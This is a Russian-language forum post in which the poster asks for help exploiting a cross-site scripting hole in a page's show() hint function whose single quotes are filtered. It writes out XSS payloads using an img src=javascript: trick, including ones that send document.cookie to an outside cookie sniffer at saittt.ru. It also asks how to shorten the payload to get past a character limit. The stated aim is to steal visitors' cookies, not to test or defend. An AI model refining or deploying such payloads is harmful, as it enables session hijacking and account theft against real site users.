Есть такая функция вывода текста:
function show(text) {
var s;
s='<FONT STYLE="FONT-SIZE: 8pt;">'+text+'</FONT>';
hint1.innerHTML=s;
SetPosition();
hint1.style.visibility='visible';
}
Она выводит на экран текст таким образом
onmouseover="show('ТЕКСТ');"
Помогите пожалуйста, можно ли вставить в show('СЮДА') еще одну ява функцию (например: alert(document.cookie) если не розрешается использовать символ " ' " (одинарной кавычки), он заменяется на Также розрешается использовать любые символы вида " , & , < и т.к.
P.S. Если допускалось использование одинарной кавчки, я бы сделал так
onmouseover="show('ТЕКСТ');alert(document.coo kie);('');", т.е. просто бы вставил ');alert(document.cookie);('
Но увы так нельзя... поэтому пришлось обращаться к вам за помощью
Уже нашел одно из решений, но всерано не могу добиться главного:
Вот такое проходит: </script><img src=javascript:alert(document.cookie);><script>
Но мне нужно чтобы кукисы не выводились а отправлялись на сниффер. Написал вот так вот:
</script><img src=javascript:document.images[0].src=http://adress/sniff.php?+document.cookie;><script>
Но выводит синтаскичискую ошибку... помогите розобраться, напомнаю использовать " ' " (одинарную кавычку) нельзя
В итогде это все работает, но там стоит ограничение на кол-во символов.. так что если возможно.. то нужно сделать длинной не больше чем </script><img src=javascript:document.images[0].src="http://saittt.ru/s.php?i="+... вот посюда оно его обрезает.. последний штрих